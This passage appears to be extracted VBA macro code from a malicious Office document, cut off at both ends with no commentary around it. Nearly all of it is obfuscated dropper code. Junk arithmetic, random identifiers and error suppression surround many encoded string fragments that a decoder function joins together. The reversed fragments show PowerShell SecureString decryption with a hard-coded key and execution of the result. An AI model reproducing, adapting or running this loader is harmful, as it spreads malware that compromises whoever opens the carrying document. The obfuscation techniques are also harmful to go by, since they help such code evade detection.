OqUinWqoP * (7457119 / CSwlfwbOwpKic / 9721166 - Tan(FLmVcHzlhcjqj / CBool(kFJjTFiDFzQ / 1493157 / PjDMsjvRfBu))))wpKOVjXV = gjHBjhbyuf(OBGPOmGfQ, 4, 8)dQIcNsh = JDFSWTdkrtS + jIBTlSFkaIz + WvCDvIYJ + NbiHqL + dpJGfAk + qccNtmb + jwhPS + jKofwjNlE + iwqmwDfj + nnwzJzqUUu + dzlRupHv + fHkdZ + TiZukVvz + MsJPddN + ntJcDiWtZXO + kJQbk + dnviYZlaFD + iRGUUsNY + nuujzXVPTqz + UulGq + wpKOVjXV + vqzkvC + UZpOKtovWMh + uOHTI + UHHIQHPzS + wfulZS + InXrLQbYI + ddWLaoYwjX + KJZTfP + TiwGaYDKiDhPJwIs = hOjBvIsNC = nEUZkE = (5710379 / qHoPFEPZ + 7018684 * wnvCI * (2958052 / BzBQj / 8311239 - Tan(PZNppJTdmtF / CBool(ERIfm / 4307002 / pROKkvFYi))))GczHPGAjq = ZkbjSBCwH = jtROuKB = (3113365 / Pdtjl + 7093180 * JtwlzRcpN * (7348495 / GwNIonuoopNFwO / 8179875 - Tan(RNfAp / CBool(wrIwWNSRcBHNvR / 7444910 / oFowwh))))woBWGRKbh = lHHCWzpQj = XMMzjTYNK = (4709765 / LsCOvUzAG + 194256 * BTWFnP * (3113197 / wpIaYV / 6826156 - Tan(RDiDADHZPEnbi / CBool(QZVQLtbifIzCZ / 7042829 / SitLi))))End Function"
File "pOzAhdwW.bas" (Streampath: "Macros/VBA/pOzAhdwW") has code: "Sub hoobLKPlXfaX(JWNHkqFOw) On Error Resume Next Dim uPXRaW() ReDim HkVEwHZHAQ(2) kEWTnQEdnasHRX(0) = 7117342 uLosoPtYpCU(1) = 2132732 nAjZKds = Loo - 6870627 bHNwjDOcEh = 2665359 * 4914523End SubFunction SHzYRwH()On Error Resume NextWfHIujbNMNc = "rFq3AQOAIGAwAwMAADA3AQOAUDGCdQvrwoIHmOPvfYujKqSfVh"qTThwY = hBtsDunzj = aGnhZnLitzGslK = (5686782 / LEZdqYLfw + 9147925 * RjEov * (2764443 / jFNBiVjGb / 9446601 - Tan(pQiOiiiXGHCuIi / CBool(kuzoIKdMbY / 2380498 / ZDujwOj))))DBwcKhIOsSJ = JfUCCWGXI = jKESBloI = (7412088 / kLDHqRYIULYF + 6170837 * ZwQsvSBnV * (9187888 / NIsYSGaKZwzcM / 2287487 - Tan(zzDwtaiisDUv / CBool(UnzpHMc / 1883078 / kBEzvGbcVEj))))MsJPddN = gjHBjhbyuf(WfHIujbNMNc, 25, 23)MTzFiUnVwSG = "GMwcIQAA1AAZAMGA3AgMAEGAhBwMAIGAkBAMAYDAkzqsYwLtUMjsADtaqTch"WblCkU = nikzJpQrk = uPGwoHVisuK = (1497589 / SDFnpX + 5396265 * nLnpRvOIdfAvBD * (7614190 / JIUAUjUFfY / 3603844 - Tan(EBbUIjHETHWLH / CBool(OOKMEOQbi / 6468438 / bfGrh))))Jrwzw = KtcUEbEfm = wjJClJtw = (3456786 / vSTDdc + 4486112 * SjEANlwdimRnJ * (5914238 / mSjSbwtij / 7773230 - Tan(mrZYqcELNGNv / CBool(XFHaGjivQ / 8621837 / lzJvzYzXMbz))))nuujzXVPTqz = gjHBjhbyuf(MTzFiUnVwSG, 20, 34)kvtdJGZLj = "sRhnLFlidjrjHtZAUGAzAwNAYGAiBQZAYGAmBAMAgDA5AANAQGAlBAZAMDAiBQNAIDAzAwYAMDA3AgMAcDAmBQOAUDA0AQOAkDA4AAMAkDAhBAZAUDA4AgYAcDAhBQNAkDA5AgMAcDA2AQMAIDAwAwYAkDAlBgZAIGAhBQOAgDAxAgZAEDAxAAZAADAzAwMAcDAIIKSRfsEjc"DiIPcPAXDl = SjJusrvGT = MWNXZXtD = (4417183 / CNntH + 6465863 * wwUritYRHG * (5220096 / tGLpufzLNz / 6873319 - Tan(jifkEs / CBool(nLQwKzch / 5730699 / GRQSZdzrYtNH))))dzpLulEEWkV = WNwMLLwNo = PqnRcHB = (8146905 / zVWGhSpG + 1032788 * sjzCfpDCwnR * (7231540 / AtCaiIAp / 8063776 - Tan(bPmzGOtVFqf / CBool(jPnIcZFCCzMFVN / 5995325 / LwEsDwXntpwnE))))dpJGfAk = gjHBjhbyuf(kvtdJGZLj, 11, 181)bbWqbSbJJ = "SmlfzfXlXfqjjAYGAlBQYAEDA3AgYAEGAzAQNAUGAmBwNAADAmBgNAMDAxAgMAMGA5AAMAgDAzFwAPhlpPdQnizo"fcfkRjSV = jcNvQDbaN = ihIYDVwTiajoa = (5081875 / wBzKMI + 7134264 * AQkRzVDR * (4322225 / vPGcmK / 4483053 - Tan(bnNbsBnnSCiQAl / CBool(PIISDwwfIKifL / 258099 / OmmRjzDZY))))MIcYmhHOZ = iiMDBnFFJ = qUirTwdHE = (3285733 / Wbmwnr + 5682163 * EvLikkYkuiV * (820644 / WpKAkuTTCp / 9795479 - Tan(OMCaGN / CBool(cWEaimuHuOidjM / 6347706 / mbvDw))))InXrLQbYI = gjHBjhbyuf(bbWqbSbJJ, 16, 60)XPHfTP = "TbaQoYjzwCwWnQaMbHVkUYDziEMIdftDA1AgNAgDA5AQZAMDAzAAMAkDA3AgNAMDAwAQMAADAmBgNAIGA2AgMAYDAmBANAUGAxAQOAUGAzAAZAQDAjBQZAIDA0AgYAEGAxAQMAUDA1AgMAMGA5AAMAQDA3AAMAMDAzAQNAYGA5AwYAYDA5AShnd"kWMEMBfq = KGdtCdwpj = UaUjjXSsQGhbaU = (5388568 / dwFmIIuqUhi + 2320120 * AKmdDt * (3813355 / WhjhJIsajjIRV / 10405 - Tan(ktnLjiMCoGjQwu / CBool(XaIoHOYFzzCPlB / 4988558 / ozKCjPhnPJfsa))))GZpckzMhf = aswflIiJj = kLooMdObAOMvQ = (7211712 / NHsUZzjfiZHGk + 9871886 * rkHHZqvbVJAii * (5782347 / fbKmYAq / 7868103 - Tan(vBjJOE / CBool(ibHXbnJLC / 3558788 / WKYOFBRujvz))))kJQbk = gjHBjhbyuf(XPHfTP, 5, 147)PTJPLcdqonj = "sKWNnZAIDA1AwNAEGA4AgMAUDAzAgMAQGAmBwNAIGAiBQMAQGAmBANAMDA4AAZAMDA1AwMAIGAzAgNAEDAyAANAIDAkBQMAADA3AQMAcDA2AAMAEDAxAANAQGAkQUlqz"smwXnkAVLtk = fsnNYSLMo = MOMCbJXAtl = (3806135 / XULiGOviaiiWaO + 9605381 * iCzjkYBrUWmaq * (3338003 / uzhUTBpL / 9375665 - Tan(JAijqbML / CBool(WqlnNwSTNk / 5492766 / nJRkWstir))))BJirSRMj = orDQaXWIi = ZPNvaIMUWAhca = (3882905 / WrNzTiSjmiziWm + 5126132 * LjqDFaOqbJXXdJ * (2277143 / iUDjJJKL / 1188045 - Tan(aMbaqivEWtk / CBool(qvdWXKLv / 545594 / WizCjumCYi))))jKofwjNlE = gjHBjhbyuf(PTJPLcdqonj, 7, 117)uiZcrs = "kDkYzNHcdKUiHwpduGjwlIDA0AQNAYDAmBwNAMGAiBQZAQGA2AgZAMGA4AAZAIGAlBgZAcDAjBwMAkDA1AAOAADAxAgMAkDAjBANAkDAmBgMAEDAlBQMAQGAiBAOAkDA5AwYAADAiBAZAIDA3AQZAQGAmBQOAIDA1AgYAcDA5AgYAADAxAgNAcAimaj"bVtOMZUuzBi = uPYJSDzch = uRkwMisWWG = (4958735 / OORTDPwvnsX + 5988285 * PSRoPAzRfR * (1631293 / PwAwfmjRMBJszz / 6540680 - Tan(mrCuFUwMbi / CBool(FaQjzI / 4573592 / SzwHFqNRNIZo))))oKwalV = PSVfnOOqu = oXwjbrvSMjbLPj = (7993079 / zDrCjDCuqnF + 7172984 * iujtSIZLYPVWvw * (8064040 / DDopERK / 9812358 - Tan(QlUCpomKXiouR / CBool(XQYYoVjnGMjnkQ / 9106425 / QkhBCXEIjajMY))))jwhPS = gjHBjhbyuf(uiZcrs, 6, 161)HNljdjwLo = "wwXFzzcMonZlqwjhYkaRANAcDA1AgZAUDA2AQZAQGAyAQYAUGAlBwYAUGAlBgZAQGA0AwMAIGAwAwYAQGA2AQMAIDA0AgNAgDA0AAOAIDAhBQOAUGA4AQNAQGA4AgZAIDAyAANAcDAlBgZAcDA5AgZAMDAkBwYAcDAjBAOLEAMJ"kwYnIhjTMT = iHuUHOwMD = ffwrEWPJwwqLwn = (9245020 / SUpGkAWI + 7759333 * aVjtaJCRzbuh * (3541158 / TDIia / 4424119 - Tan(GYrvdW / CBool(NiJnCSwucFVhIj / 8130761 / VkCpnjsn))))RPFvacwunvi = iRbTzozwm = DSSHiz = (841482 / aDMsOcQDW + 2098256 * jJjmVFlqcz * (7691371 / YuDdXC / 2660664 - Tan(CkPGob / CBool(DzDtSmVFwWjw / 379606 / IbamvnzKwtBIE))))dnviYZlaFD = gjHBjhbyuf(HNljdjwLo, 6, 146)dDBfWqswBYl = "ii2AwNAYGAiBAZAgDAlBgNAIGA5AgYAUGA4AQYAIGishhNjRRjpE"NIYZQjUXwOE = fDLIEaDcG = CTDinJIw = (2561036 / SWwoiuMTanKFn + 5631833 * AftrWmBhlF * (7017874 / qChGP / 9648388 - Tan(oIFXdKNkCSIwf / CBool(EndOFqFQp / 2483611 / upVRshuHtoU))))JMOtpGcmdNn = vHQjICwPd = EilOEs = (2029575 / oXTsoj + 3904858 * SKlOomlksVwYi * (584123 / ajapLkCn / 7897066 - Tan(AERADTjMQjo / CBool(OTStBWjtmZ / 7272966 / tIOtIH))))nnwzJzqUUu = gjHBjhbyuf(dDBfWqswBYl, 12, 39)cPWlw = "SkbDAyAgMAYGAhBwMAQDAlBAZAYGA5AQYAQDAlBQYAcDAlBAZAEGA4AQOAUGAyAgMAQGA3AAOAgDAiBQZAIGAiBANAEGAwAgMAMDA4AgYAgDA5AQZAcDA5AgYAYDA3AjFZOwqCt"BlZcj = izhDRVQpm = zRASPjDfjwHm = (8997914 / JuPYTnwNuXR + 2601460 * hJRdcLmWFSh * (3980077 / DSjRdvEBt / 4461486 - Tan(rWwmjX / CBool(ABDVWSTfbH / 1900702 / bhEtk))))KrKLnD = jhcuWJfnm = lGMAnhp = (6367742 / WhwOwzUw + 8321032 * vYncOGCujdsYi * (6850997 / hZOHWW / 7437799 - Tan(lWCjS / CBool(wCMnzrnwdw / 8967133 / mGDawzMIQYFp))))wfulZS = gjHBjhbyuf(cPWlw, 9, 124)vkudtYdiC = "pkIkoAcDAhBQOAADAkBAMAYGAqcpTiusfSNFJr"vLVzPTF = MNVOLoDTj = HvisGqEpcZbUEw = (7632590 / HKpvDMoBYOEdWV + 9098104 * VTXMiO * (533504 / ijAOHrI / 4789469 - Tan(PjsdlsuGhU / CBool(mbTHiVwlZbMsH / 5783974 / TLaujGf))))EIjaGGSHw = CGoCckacG = uKYHQ = (8706000 / lsWzACokzYY + 6837545 * nnlGZMSbsOK * (9306839 / LwwFFDSrI / 7674994 - Tan(fCEARcMBtaN / CBool(ZRhEaH / 8791124 / MDfqpnuSVR))))qccNtmb = gjHBjhbyuf(vkudtYdiC, 14, 20)ifrzOmVju = "ADDOCnTMGmirEQliQOAUDA0AANAgDAyAgNAADAmBQMAUGAlBAMAADAmBwNAkDA0AQYAMDAzAQOAMDA0AgNAMDAwAAMAEDA0AgZjRwlfLiQXTTcSvUCP"nihcEZGwn = jRPtrKBAR = TZYbcKQJhTpTjI = (2003540 / NasSFIUZd + 9736862 * GGCBjUmNu * (644148 / rEwSRpM / 2490772 - Tan(HiUwbHzsLFz / CBool(inKDfSGwuvQTDi / 7761119 / nqfMQOPXl))))AnhCV = FacVtCoDM = RmOmWGO = (8010323 / SAtsTiF + 3952771 * mhPXmRZrdd * (151861 / bPqVXiYEIGBYD / 1055813 - Tan(LhIrohNRiztA / CBool(MicloTqkDXvvjQ / 3486686 / jrTjjOKVmMK))))iRGUUsNY = gjHBjhbyuf(ifrzOmVju, 18, 82)dHMZBuXtBo = "wfiYwQTahjlPnawDAxAQNAIGAlBgMAcDAxAQOAIGAwAAMAQGAyAgYAQGAlBAMbwiwpMRw"TPpHONjtX = tjffzAGjS = oNIABKicTNLaA = (7749519 / JiObojdhh + 1765236 * cDmwkVS * (292358 / lzXMzvDOAnT / 6131813 - Tan(HnRsEdHLjarqi / CBool(qVdpHzImKK / 269225 / tfOjtpflww))))oIvfDVkz = jsRouUEYf = RUNtWwLji = (4074126 / HqdjbwzjCK + 9456727 * rolYSEnhli * (5908629 / YRVKvd / 9774166 - Tan(bVYBn / CBool(SXFrd / 2339543 / qWElZsbv))))iwqmwDfj = gjHBjhbyuf(dHMZBuXtBo, 9, 46)saLsWqnASUj = "oUrhqtTcaYgDAnzRFNcYSwMOAwCF"DzzaG = sRtlwsSLm = GVIYKKLzL = (6183644 / MhTjujjHKo + 2833116 * zXCliNudGdXoGO * (1794589 / WQcToUjjZCDLlE / 5472110 - Tan(sXKAIZdmQDU / CBool(KfcjXlktMvJ / 5563719 / SLjJjrBBnwjDI))))izIZGwtSTib = nwnpDlzzZ = ZXoAUiXwNhJpO = (9439404 / jLTjXitdOw + 7648419 * WrXdtt * (3310126 / mvrhSQ / 9927546 - Tan(WzziqNWaj / CBool(BLjuZCjc / 227460 / pEPwz))))JDFSWTdkrtS = gjHBjhbyuf(saLsWqnASUj, 16, 3)OYkZjF = "vZMLZLFXOIYpLizLzWHYCRtHvisOYGAkBQMAYDA1AAMAUGAjBQZAcDA3AwNAkDAhBQZAUGAlBgMAUDAjBwNAcDA0AwNAUGA4AAOAADA3AwYAYDA2AguPKmCXacGz"JmozzDMiUmb = GzFzAGNHN = tErJwVdBfiCajN = (2922446 / quvqwHjl + 3893558 * QMoCjpjkfQ * (6990838 / ijKRS / 9210800 - Tan(fRsjkQSMWAlXFp / CBool(FQMczMuv / 6556697 / foMOjholmoNYcD))))qzhjV = mQdJjttiM = btEpwmlV = (1980426 / FcGzqTzmTAEj + 7713391 * qjjkLo * (930090 / bvnmd / 9819399 - Tan(zDrOrwJJfTQw / CBool(LLMuFu / 9812564 / DAKVjEA))))TiwGaYD = gjHBjhbyuf(OYkZjF, 11, 86)NYiUQCn = "ZGnZiroBtCFswAgYAgDAzAAZAMGAmBAZAYGAwAANAIGAkKIA"iNDRRVPpq = BiQYwiowT = ObiYUDrT = (4850 / TTTBVStKRjuj + 9049938 * jvAwIPja * (5383173 / LLmAHiK / 82662 - Tan(AfiOPCfodfmXf / CBool(NoZCtKkHsrF / 8051457 / ftDmWup))))coSawZIji = vkAjlwdbC = pqfiZLibRpKsnq = (1763553 / rzvasQdql + 5567606 * sRwhIEwBOKfG * (6579516 / LEEfCzKX / 2328473 - Tan(ijcCZ / CBool(ptwXpKU / 1550265 / oqpuP))))WvCDvIYJ = gjHBjhbyuf(NYiUQCn, 4, 32)GDFwGBnd = "iTHULinJSThUjuKlSCaTGNirtSeRUceS::]LAHsram.SecIVRESPoRETNi.EmItNUr[ (otUAGniRTsOTrTP::]LaHsRam.sECivrEsporetnI.emiTNuR[ ((XEiCwfTczYQcbhSlZlAc"rwhXqMKs = BRDRvpnMv = rkbwbmPGYzfD = (9772879 / kPkSjcUPAHGi + 2695084 * KiazvmChjwhFq * (8899612 / IEwTQjfFUdTU / 5480417 - Tan(TqsYWwqYfIM / CBool(DjlkimaisDIP / 9518522 / idFWbRa))))kOjPZTWp = zPIojTzuk = pGfdwTjwj = (8979401 / rQhdbKRMSJjvKF + 3284640 * wzTcjHiTIR * (6612948 / KWYvWbGzaLF / 1647043 - Tan(hSPILVXhqnA / CBool(SOklOUJ / 5473690 / CwklYizRCksK))))jIBTlSFkaIz = gjHBjhbyuf(GDFwGBnd, 18, 106)tVrcq = "cBM0AwMAUGA4AAZAUGAyAwNAIDA4AAOAMGAiBANAcDAjBQMAQGAiBgZAYDAwAQNAcDAwPphDCJJQNjoRFYWN"IIOkakLYFq = rbmRLCiFD = zXlWCOiZNQw = (5023489 / SSstsWi + 4383201 * HOIzD * (8042930 / jjAsaU / 9401839 - Tan(urzOjzHXQQU / CBool(TJmjVLsPXNDKsQ / 6468880 / whkwVMzAZTn))))ZIAovifYTz = HzrrijqpX = QXObhJjomWSPbb = (6866470 / VdHJlJCXlPj + 4303756 * bCbKjfJV * (4340761 / CTMnzUrYPHCN / 2412042 - Tan(NLHVqqRcKUK / CBool(rFrvZKzp / 823504 / ZWFDtrQOSOptz))))dzlRupHv = gjHBjhbyuf(tVrcq, 17, 65)SmQjAWqZ = "wLcQAYLvTkipjXBAkDAxAgMAMDAiBQNAEDA4AgNAYGAiBwYAkDAxAQZAQDAwAQYAMGAiBQOAQDA2AgMAcDA4AAMAYGA4AQZAADA4AAOAcDA5AQMAIGAiBAZAADAiBQNAgDAiBAOAQGA1AQOAQGAmBANAMDAzAANAQGA3AQNAQDAkBAMAUGXwpiEqqAtdwqnONPGfCzFoD"EYRwpJhmJTG = jjNokUPUq = btcwAkP = (1074239 / Pkfzjds + 6595429 * zQiozwcMiXJkkV * (2781765 / NUOQNdLrwS / 9409414 - Tan(miLsm / CBool(VafmwfWo / 509716 / vdfPRWWIiRlVE))))wTwjzJMTq = rsizXaDLR = UAnvaXiuZbTvTn = (6359695 / QICOUizVnuSf + 9675947 * zjdfKPd * (5066751 / lvWMulwYqSkKuJ / 703726 - Tan(qARHfFCwLb / CBool(RndRKpMRSzRF / 7050750 / VbNNEEWaCTPLS))))fHkdZ = gjHBjhbyuf(SmQjAWqZ, 24, 163)JDVYs = "rSSjtRqAMGAjBwMAADAyAwMAYGAzAAZAIDA3AgYAkDAyAgNAUGAiBAZAEGAzAgNAIDAyAQMAADAkBQYAYDAhBgZAUGAkBQZAEGAyAgNAYDAyAAOAADAhBgYAEGA1AQOAUGA5AAMAQDAiBAZAbcWl"uUOPzhqw = UUqiVfWrF = mLMLmlXdP = (7403044 / jwhoawW + 8846466 * lkoRHcvZqcmQoi * (7411008 / QkkPO / 4851865 - Tan(cWkVItuizzKoBW / CBool(DKqwmmAuvUvlKM / 7283137 / hLkMuXGmfv))))ZBLBU = tmTiqkjUj = ZPmMbcpBMH = (6841369 / NTccRJBfD + 640013 * qtNbQiKF * (8229902 / KERZXkRiFZY / 2375170 - Tan(ZzBOTWSAX / CBool(wvTOBYXCB / 8611467 / CPLCtYjzwduiW))))UHHIQHPzS = gjHBjhbyuf(JDVYs, 5, 137)UiztOiYhAj = "rUAEDA4AwYAkDA4AwMAUGAmBgZAEGAmBQNAYGAyAQNAYDAjnozMKJflXwiPZzZmiCWKco"EiNEwWjEQE = AsYMhEcpq = ULWKnYSjrZLGB = (7873123 / CpHLXS + 4752657 * jGLaZDpn * (5124254 / uIuiwwOk / 2523110 - Tan(FYuqjGiPUdSZ / CBool(rnEbzsdBlloGjL / 3959878 / LznFlOKMUqTZa))))hiEZir = TzzUMCusU = rjlTnGkD = (8903620 / VJffUK + 5537115 * sHHZDbSnol * (3673013 / ZBqjwV / 9890387 - Tan(XFkmZPEKRUACaS / CBool(NJRfKBARwkljUS / 9791493 / wLhFmXUAoWI))))UulGq = gjHBjhbyuf(UiztOiYhAj, 24, 44)pvRCJFzZ = "qJPInVmJjhlnsAEDA5AwYAkDA4AQMAYDAxAgMAYGAhBwYAgDAiBgMAADA4AAZAIGA5AgYAMDA4AQNAQDAyAAOAcnMKVkbLLwDC"kICFNCSHqIr = hiAsrJVnp = LjaFUM = (2230381 / oFlQZ + 6698529 * HQzXRiu * (7782608 / VnCwpkwRo / 1588799 - Tan(nfciQPKqoZRER / CBool(ktXPXcQvAkj / 1969697 / MDGUbRp))))dcNiW = YbnPHCTEz = DikSF = (8306354 / CRjcsisBFC + 9683134 * iFpncIIGIHVI * (2279325 / AjwZuHMfSKlMjz / 9106123 - Tan(BzVSRuO / CBool(IKwlSuvXQwiLDj / 1572582 / aCnfCPbLKuGVn))))ntJcDiWtZXO = gjHBjhbyuf(pvRCJFzZ, 12, 74)TjhXiqD = "YLvhXuaslfHORakdIqETjBQYAIDA2AQNAkDA2AgZAMDAjBwYAUGAjBQYAEDA2AAMAQDA1AAOAADAwAAOAcDA4AgMAQDAzAwYAEDAxAAOAEDAmBAZAkDAhBwYAQDA4AgNAMGAiBQYAIDA1AQMAQDAyAQZAMDA4AANAQDAlBgZAgDAlBgZAMDAkBQNAIDA4AQYAQDA2AAZAIGAxAgZAMDAwAQOAADAmEDaBb"jblYmUEE = rQEZrtzmC = bVEYIprVGwwfcM = (8925790 / wkafLKJoHT + 1160172 * KfBDhtADMWhUOz * (8439089 / cMosfRzOLXkRL / 3085714 - Tan(pjtLawuz / CBool(LqNZCGQNSPM / 8920816 / NTtimsJJjsw))))OjhjCHK = EskVmRzhP = joDXL = (1034148 / WwwDXK + 4221053 * RrKCoZbwQ * (4059567 / WvaBSif / 5012602 - Tan(ipLamCmlvsh / CBool(OvVZmfbfFpn / 384821 / jLwzd))))ddWLaoYwjX = gjHBjhbyuf(TjhXiqD, 7, 199)NaivjKdl = "ZtbDzovqzQYAIzkjpHoUIzNrzMAQGAhBAZAwHA9AQPAcGAuBQMAkHAPBgTAUFA2BAUA4EAiBgQAgEArBgTAMGAzBwaAgFApBgQAUGA8BgM5435a05061b3143240f3476111d29467'($(RTSBOfQS"FfWIojB = EuvLCMQts = foWsZoA = (903348 / aHjPwlQLwXWF + 8490926 * hiTFAz * (4893213 / IkTSczAcTM / 7967587 - Tan(zmVfzalATVV / CBool(nfoNFi / 9872383 / Ovzwvj))))RzGnorP = ISLTDKPML = JnIaNYLmOMizJm = (4454894 / MjQCnWkRRSpA + 3504911 * qbUtERa * (4800697 / pkMkiBLJYwSzj / 9179164 - Tan(HnDrIu / CBool(LUCWDdPiFKn / 8390918 / RblBPGJRDz))))KJZTfP = gjHBjhbyuf(NaivjKdl, 4, 122)vJXWlj = "ZGFbBwmnrPazbKzMQvcADtCogMAADAlBgNAgDAxAAOAkDA2AANAQDAlBgMAMGA3AQNAMGA5AgZAEDA2AQYAADAlBQZAYDAkBgYAIDAyAgYAEGA0AwNAMGAyAgNAIDAwAwNAEDA4AgYAcDAGuEJP"mdizzCjwfn = jpNzXCjUJ = daMKmrHwFMM = (3561756 / JTJRzwjqAW + 8885859 * MMQsUS * (2082203 / NXYknbSWXj / 6638578 - Tan(QNDjOkiX / CBool(qcESAafrF / 7048693 / BpOmuYiWiMTRn))))bdLBdzZqvB = dtwIjijkm = WuUSn = (158562 / iRzoObzRmpGM + 8716265 * XLQoGbX * (1643325 / AKOmssZGrV / 8392485 - Tan(CSzORzqwodX / CBool(pwiDdjYPWpwiA / 7759094 / YMjOrB))))UZpOKtovWMh = gjHBjhbyuf(vJXWlj, 6, 118)lINwNw = "OifETHFz )))) ))961..641( yEK- GNIrtSERuces-OTTreVnoC| '==AA2AQMAYDAhBQOAEDA0AQOAgDAwAzFJWcBTAklYPo"VwFRKWVYcck = VOptjLUiV = kCEwtHij = (9040514 / SwjUbYGLiiw + 4410447 * wtGuino * (4622363 / nZsjifKl / 3024060 - Tan(plYXhVRHEJ / CBool(nWNrHFmMEwGIAK / 1378374 / uqbBzSUhZY))))iwjzwhSLZai = WYZMfkOSA = fpaZX = (4872565 / fjcXMat + 4462005 * dICUBfSj * (6662822 / mrQWuhK / 791564 - Tan(FPBdXHpwwAKzfp / CBool(HGPfBzX / 8312510 / KmTOMiqBWzRBb))))uOHTI = gjHBjhbyuf(lINwNw, 14, 79)CtkUlwYfi = "rWBYYoGzijNTnitGSIfOKTYZwSNDAfhtqMAIDA2AwMAMDA1AwYAkDAlBAOAYDA4AQMAUGA5AQNAgDAyAQMAEGA1AANAMGA2AQYAMDA3AgYAYGAiBQMAADAiBwYAMDAyAwMAYDAkBQMAMDAhBAMAUDAjBQNAYGAzAAZAMGAkBwNAYDA5AgNAYDAwAwNAUGAyAYvKqOv"kWwfKMS = jOOqsDWvi = FHlXO = (6211209 / IFVDNanoBWIln + 5300370 * qrFVzqULIkh * (7498052 / wlqZoufC / 2467903 - Tan(WoaCrjNKucYR / CBool(SthAnuMSfnVpP / 6145690 / wtwidGjhYnd))))aIJoivDpaJz = ivZmKthrY = HtsIARqAFMb = (78948 / OBjunniLIM + 1843768 * RsscbIX * (1355119 / ozEWc / 7945412 - Tan(jTbCiQLkiztEq / CBool(wjisjYzY / 5699435 / DtcZC))))vqzkvC = gjHBjhbyuf(CtkUlwYfi, 7, 159)uGMLD = "ITMvfUBjuiA3AQYAQDAyAQNAcDAzAgMAEGAjBAOAMDAwAAZAMGAmBQNAQDAlBQOAkDA2AwMAYDAhBwYAMGAmBAMAotpVIjMMVQn"SuJlN = AJWLACMLY = HrpLh = (8728323 / TqZASOoNcXrbN + 8489026 * oFnXsztBnk * (1789620 / QMbzwZQ / 20055 - Tan(qchviz / CBool(iUjKMfCjY / 1930030 / tapmQ))))SpqZodGzfm = JAXAAatCz = WzdFcJzVXSAwA = (7165868 / rYoYWZ + 3215938 * LYuLz * (4465057 / bhNUJ / 1089546 - Tan(ThruFS / CBool(QKAmqICE / 5775930 / SFtRjhwBwT))))NbiHqL = gjHBjhbyuf(uGMLD, 12, 78)FVlzE = "djbuSEbwaMjBQOAYDAlBgNAADA2AAMAQDAmBwNAIGAlBwMAMGA0AgYAMGAwAgNAYGA0RjRJFNSnspJKidvfHfViCb"fzfiKzsw = rHOlHDYfN = ZtPvIIa = (5008334 / czuWmpUwPLjba + 2655574 * jzbSqwtnw * (1362886 / dQOZUPMEz / 6170171 - Tan(kbvmHJUijzfrOJ / CBool(HjriLwPOMEi / 8149756 / TOWOskOzXDqkS))))mMPkLiSVq = UXYzYzPnH = NQUAVNjiZT = (5735214 / UcRzivh + 7086304 * AwsbspOfibD * (2253985 / JzXjtmnVRRpJ / 483329 - Tan(jZVTGXzMSbYcXU / CBool(qrawj / 3792182 / bvCuwKjh))))TiZukVvz = gjHBjhbyuf(FVlzE, 23, 57)OBGPOmGfQ = "ZGnQizwzoDtOIfIbhAmCGVfzPkMhBANAUGA1AgMAkDAxAwNAIDA0AwNAADA0AQNAMDA3AANAMDAhBAMAQGA2AAOAQDA1AgYAADA1AQOAUDAkBgYAUGA1AgZAkDAzGcr"QdcZqz = putvtEuIh = tzYLTE = (1123942 / NzpzLERIwRoDNa + 3077992 * HurFiAcJGW * (7425529 / UIJiuQzRAqjodk / 985387 - Tan(TivShtEYNA / CBool(MWfsoRSnq / 1593231 / IwdwiQ))))MDqLVl = LCbtvzqba = SbDkQtvl = (8901659 / wuWLwOUJW + 9918773 * iOnNLZbQXpQOw * (66295 / mXtPArE / 1877996 - Tan(RfPwhihF / CBool(ijMQXFUTUW / 6096859 / jYLjbwPHzwd))))wpKOVjXV = gjHBjhbyuf(OBGPOmGfQ, 4, 97)FGrNokEuTNw = "QELEkPABbhWCEWizjPhZnHriiiBANAIGAlBgZAEDAkBANAMGAhBANAIGAwAgNAEDA3AAOAgDA0AQNAYDAyAwMAIGAxAgNAQGAkBgZAUGAlBAZAMGA2AAMAUGAmBQMAUGAmBgMAYGAmBQYbXpiB"kvPzjdJNYzi = CFWGThLhQ = piWNcapsUXT = (4113848 / oiZAZBiBNQKLiV + 6047323 * ZBKlanVOcKj * (3033238 / LnwhKhbu / 6296610 - Tan(fhicNMCzEJIv / CBool(IjUBIKXOS / 3681423 / CdNiToDqsOiD))))adIzMBIhc = sLICaMfGI = RnzqjTjJ = (4520340 / OzZkwYi + 3055175 * SCHdjc * (8057347 / HzCnN / 5365706 - Tan(MajdIkGjrQou / CBool(XEChPzqMJJRO / 8113990 / cLUaBVmY))))BzPak = gjHBjhbyuf(FGrNokEuTNw, 6, 116)jVmpGERfY = "LGwXfFgMAUDAzAQZAUGAkBAOAMGAiBgMAUGA4AQYAgDA4AQYAUDA3AANAEDAlBgNAgDAkBwYAkDA5AQYAUDAyAwNAcDAyAQOAEGAyAwYAQGA3AgMAIDA2AQZAIDAzAwYAUGA2AwMAYGAiBgYAMGA5AAOAYDAyAQYAADA3AQYAcDAwAAZAUDA3AgYAQDAkBwMAIGGlmMuYRpjiYj"lasUB = dYjtSZzwA = VXjMBhLnF = (5720703 / NnmEJbcoWkF + 4016938 * zwzuzJJi * (1356354 / TKzQDZKztKFPlz / 7949065 - Tan(wVJioQ / CBool(NNDhR / 7958074 / UwGsStKLYPLkMK))))OFjSttizL = NjNCFoLoY = GDIlCArtKz = (8102930 / Isfvwm + 9366160 * SDEszdpfLAkfZ * (5767406 / PlYIYYSaOUHa / 4086915 - Tan(JpYrfKCwQ / CBool(ZKMiJNKjiFQK / 5041532 / YVAcqXsDUI))))vFvvcfdFmQ = gjHBjhbyuf(jVmpGERfY, 13, 189)tRNazmsWqk = "PUkBQMAMGA1AQYAQDAmBQZAUGA3AQMAQGA2AgZAEGA3AwNAQZIiBGkjXvazr"cjcMvJJjXVO = OTiaOkBdC = ACCMsLshoAMs = (8373105 / dXLurTQNi + 2769675 * owUwmHaQMomjjO * (9945090 / STBhVbFwqZG / 7309306 - Tan(UmToREMYjBt / CBool(cilrrfjriwuh / 6242257 / MtXHNAojs))))LoROquIhj = BSsOKnMjR = vswUEz = (8769812 / uAWslIsrSA + 5234094 * szwmjZwRWEWP * (5471367 / kjQZSITau / 6092711 - Tan(JjkWTULHd / CBool(zwJkfAc / 687997 / iGPLXLatiSUSD))))MUFwAhiiSa = gjHBjhbyuf(tRNazmsWqk, 13, 46)kiSMIFS = "KAIvwzGLzzGAwAQOAADAxAQOAADAjBwYAMDAxAwMAADA4AQNAgDA2AAZAQDA3AgYAIDA1AQZAgDAmBwYAcDA3AQMAkDAlBQZAYGipjsAz"CHnLzHkTEYp = QdUciXWhi = AuQrjPkzow = (6936854 / ZmrWHbvpUZA + 6147250 * BDZBnmAoMOwo * (4170890 / klMhBzkDhkMQum / 7804727 - 